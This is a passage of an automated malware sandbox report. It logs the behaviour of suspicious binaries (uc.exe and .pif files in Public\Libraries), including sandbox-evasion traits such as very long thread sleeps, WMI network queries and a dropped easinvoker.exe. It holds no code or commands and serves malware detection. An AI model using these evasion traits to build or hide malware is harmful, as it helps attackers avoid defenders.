Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 3D940000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 3DDE0000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 3DD00000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 25B80000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 25F70000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 27F70000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 3D900000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 3DD30000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: 3FD30000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 23_2_004019F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAABA20F6D sldt word ptr [eax] 17_2_00007FFAABA20F6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199809
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199687
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199305
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199172
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197547
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197435
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197328
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197219
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197109
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196880
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196766
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196652
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196544
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196403
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196229
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196124
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196012
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195854
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195728
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195608
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195470
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195295
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195143
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194979
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194835
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194719
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199865
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199744
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199618
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199448
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199323
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199199
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199043
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198916
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198764
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198627
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198467
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198331
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199829
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199704
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199590
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199469
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199359
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199250
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198888
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198657
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198532
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198422
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198185
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197954
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197836
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197730
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197586
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197471
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197344
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197235
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197094
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196985
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4640
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4699
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5088
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window / User API: threadDelayed 4680
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window / User API: threadDelayed 5110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window / User API: threadDelayed 2876
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window / User API: threadDelayed 3306
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window / User API: threadDelayed 3310
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Window / User API: threadDelayed 6521
Source: C:\Users\user\AppData\Roaming\uc.exe Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF API coverage: 8.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7636 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 4699 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep count: 5088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480 Thread sleep count: 4680 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99872s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480 Thread sleep count: 5110 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99749s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99640s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99530s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99417s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99297s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99181s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -99071s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98959s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98843s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98734s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98624s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98515s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98399s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98296s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98176s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -98062s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97945s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97825s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97718s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97609s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97499s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97390s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97281s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97169s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -97062s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -96953s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -96843s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -96734s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -96624s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -96515s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1199809s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1199687s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1199305s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1199172s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1197547s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1197435s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1197328s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1197219s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1197109s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1197000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196880s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196766s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196652s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196544s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196403s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196229s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196124s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1196012s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1195854s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1195728s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1195608s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1195470s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1195295s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1195143s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1194979s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1194835s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1194719s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928 Thread sleep count: 2876 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99879s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928 Thread sleep count: 3306 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99765s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99655s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99546s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99435s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99325s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99209s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -99078s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98936s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98822s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98718s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98606s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98484s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98374s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98156s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -98046s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97936s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97797s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97685s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97564s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97424s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97292s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -97180s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199865s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199744s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199618s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199448s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199323s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199199s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1199043s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1198916s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1198764s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1198627s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1198467s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044 Thread sleep time: -1198331s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep count: 32 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992 Thread sleep count: 3310 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99875s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992 Thread sleep count: 6521 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99751s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99609s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99500s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99388s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99265s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99146s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -99019s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98890s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98781s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98672s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98562s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98453s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98342s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98218s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -98109s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97979s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97859s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97750s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97631s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97515s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97390s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -97278s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199829s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199704s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199590s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199469s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199359s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199250s >= -30000s
